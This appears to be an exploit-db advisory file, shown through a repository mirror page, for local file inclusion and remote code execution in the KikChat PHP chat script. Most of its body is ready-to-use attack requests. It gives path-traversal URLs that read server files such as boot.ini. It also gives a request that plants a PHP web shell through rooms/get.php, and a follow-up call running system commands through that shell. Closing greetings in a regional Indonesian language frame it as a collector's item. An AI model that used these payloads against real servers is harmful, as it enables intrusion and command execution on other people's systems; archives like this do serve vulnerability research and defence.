bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/30235.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

31 lines
No EOL
1 KiB
Text
Raw Blame History

# KikChat <= (LFI/RCE) Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# Script : http://petitvincent.perso.free.fr/Webmastering/Script%20PHP%20HTML%20JAVASCRIPT/php%20scripts/kikchat.zip
# Tested : Windows / Linux
# Dork : download script
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnable LFI [ private.php ]
http://127.0.0.1/KikChat/private.php?name=../../../../../../../../../../[file]
http://127.0.0.1/KikChat/private.php?name=../../../../../../../../../../boot.ini
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnable RCE [ /rooms/get.php ]:
http://127.0.0.1/KikChat/rooms/get.php?name=shell.php&ROOM=<?php system($cmd); ?>
http://127.0.0.1/KikChat/myroom/shell.php?cmd=whoami;id;uname -a;pwd;ls -al
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
makase banyak :
tau lo bentor to hulandalo
tamongodula'a wau tamohutata, dulo ito momongulipu
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
p.s
malandingalo wa'u sebenarnya mohutu sploitz
bo sekedar koleksi saja :D
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
// gorontalo 2013
Reference in a new issue View git blame Copy permalink